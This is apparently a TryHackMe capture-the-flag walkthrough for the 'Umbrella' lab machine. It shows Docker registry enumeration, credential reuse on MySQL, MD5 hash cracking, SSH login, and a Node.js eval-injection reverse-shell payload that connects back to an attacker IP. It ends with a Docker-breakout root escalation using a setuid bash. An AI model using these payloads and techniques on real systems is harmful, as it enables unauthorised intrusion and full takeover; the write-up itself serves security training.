Umbrella

Room Link: https://tryhackme.com/r/room/umbrella

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/5000 - Docker Registry

List repositories

Kali

curl -s http://$VICTIM:5000/v2/_catalog

Get tags of a repository

Kali

curl -s http://$VICTIM:5000/v2/umbrella/timetracking/tags/list

Get manifests

Inside the manifest we find potential credentials

Kali

curl -s http://$VICTIM:5000/v2/umbrella/timetracking/manifests/latest

TCP/3306 - MySQL

Kali

apt install mysql-client-core-5.7 
mysql -h $VICTIM -u root -p'Ng1-f3!Pe7-e5?Nf3xe5'

Kali(mysql)

show databases;
use timetracking;
show tables;
select * from users;

Kali

wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py  
python3 hash-id.py 2ac9cb7dc02b3c0083eb70898e549b63

hash.txt

claire-r:2ac9cb7dc02b3c0083eb70898e549b63
chris-r:0d107d09f5bbe40cade3de5c71e9e9b7
jill-v:d5c0607301ad5d5c1528962a83992ac8
barry-b:4a04890400b5d7bac101baace5d7e994

Kali

john --format=raw-md5 hash.txt 
john --format=raw-md5 hash.txt --show

output

claire-r:Password1
chris-r:letmein
jill-v:sunshine1

TCP/22 - SSH

Kali

ssh claire-r@$VICTIM
Password: Password1 

Privilege Escalation

In Claire's home directory we see the files that host the website. We can see the timeCalc uses the eval statement which is vulnerable.

Victim

cd /home/claire-r/timeTracker-src
cat app.js

TCP/80:443 - HTTP(s)

Kali

nc -lvnp 1337

Login

Username: claire-r
Password:Password1

Payload

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("sh", []);
    var client = new net.Socket();
    client.connect(1337, "10.10.245.149", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Full TTY Shell

script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg

Docker Breakout

Exploit: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation

Privilege Escalation with 2 shells and host mount

If you have access as root inside a container that has some folder from the host mounted and you have escaped as a non privileged user to the host and have read access over the mounted folder. You can create a bash suid file in the mounted folder inside the container and execute it from the host to privesc.

Victim(root)

find / -name "tt.log"
cd /logs
cp /bin/bash . 
chown root:root bash
chmod 4777 bash

Victim(claire-r)

find / -name "tt.log"
cd /home/claire-r/timeTracker-src/logs
./bash -p